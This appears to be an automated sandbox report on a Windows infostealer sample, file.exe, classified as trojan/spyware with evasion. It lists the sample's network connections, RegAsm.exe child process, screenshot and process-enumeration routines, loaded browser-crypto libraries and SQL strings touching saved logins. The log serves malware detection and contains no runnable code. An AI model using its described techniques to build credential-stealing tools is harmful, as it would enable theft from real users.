Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 96.17.209.196:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.246.168:443 -> 192.168.2.4:49733 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00411DF0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

1_2_00411DF0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003180C3	0_2_003180C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0031879F	0_2_0031879F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027C918	0_2_0027C918
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029CA52	0_2_0029CA52
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029CE6C	0_2_0029CE6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002D0E83	0_2_002D0E83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029D298	0_2_0029D298
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029D6B2	0_2_0029D6B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029DB23	0_2_0029DB23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00319CA8	0_2_00319CA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029DFA7	0_2_0029DFA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00276001	0_2_00276001
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00276001	0_2_00276001
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029E418	0_2_0029E418
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002B24F0	0_2_002B24F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002D267F	0_2_002D267F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025A7B1	0_2_0025A7B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029E856	0_2_0029E856
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025A7B1	0_2_0025A7B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002BE92B	0_2_002BE92B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002B6973	0_2_002B6973
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002B2B60	0_2_002B2B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029ECA7	0_2_0029ECA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002B6973	0_2_002B6973
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002AEECB	0_2_002AEECB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002B30A0	0_2_002B30A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029F0E5	0_2_0029F0E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00317621	0_2_00317621
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029F60E	0_2_0029F60E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00232671	0_2_00232671
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002BF82B	0_2_002BF82B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00232671	0_2_00232671
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00317B72	0_2_00317B72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0029FB4A	0_2_0029FB4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002AFC60	0_2_002AFC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002AFF78	0_2_002AFF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041D209	1_2_0041D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041E387	1_2_0041E387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041D75A	1_2_0041D75A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041F890	1_2_0041F890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C264CF0	1_2_1C264CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25292D	1_2_1C25292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C3B9CC0	1_2_1C3B9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2512A8	1_2_1C2512A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C252AA9	1_2_1C252AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C251C9E	1_2_1C251C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C305940	1_2_1C305940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C379A20	1_2_1C379A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C252018	1_2_1C252018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C3B9430	1_2_1C3B9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2F9690	1_2_1C2F9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C30D6D0	1_2_1C30D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C269000	1_2_1C269000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C375040	1_2_1C375040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C42D209	1_2_1C42D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2E53B0	1_2_1C2E53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C253580	1_2_1C253580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C278D2A	1_2_1C278D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C251EF1	1_2_1C251EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C354A60	1_2_1C354A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C390480	1_2_1C390480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C278680	1_2_1C278680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C278763	1_2_1C278763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2B4760	1_2_1C2B4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2E8760	1_2_1C2E8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C378030	1_2_1C378030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2D0090	1_2_1C2D0090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2D8120	1_2_1C2D8120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C253AB2	1_2_1C253AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25290A	1_2_1C25290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C287810	1_2_1C287810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25251D	1_2_1C25251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C27BAB0	1_2_1C27BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25174E	1_2_1C25174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25F160	1_2_1C25F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C283370	1_2_1C283370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2519DD	1_2_1C2519DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C296E80	1_2_1C296E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2B2EE0	1_2_1C2B2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C42AEBE	1_2_1C42AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C253E3B	1_2_1C253E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C38E800	1_2_1C38E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25481D	1_2_1C25481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C36A900	1_2_1C36A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C34A940	1_2_1C34A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C3369C0	1_2_1C3369C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25AA40	1_2_1C25AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25EA80	1_2_1C25EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2547AF	1_2_1C2547AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C27A560	1_2_1C27A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C34A590	1_2_1C34A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2666C0	1_2_1C2666C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2DA0B0	1_2_1C2DA0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C25209F	1_2_1C25209F

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00232266 appears 48 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00233094 appears 53 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 002C1CDC appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1C4306B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1C253AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1C251F5A appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1C25395E appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1C251C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1C25415B appears 135 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004022D0 appears 286 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 340

Source: file.exe

Static PE information: invalid certificate

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/26@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00410B00 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

1_2_00410B00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

1_2_004110A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199677575543[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\12da8933-30be-4688-b023-418b00544010

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: EBKJDBAAKJDGCBFHCFCG.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 340
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

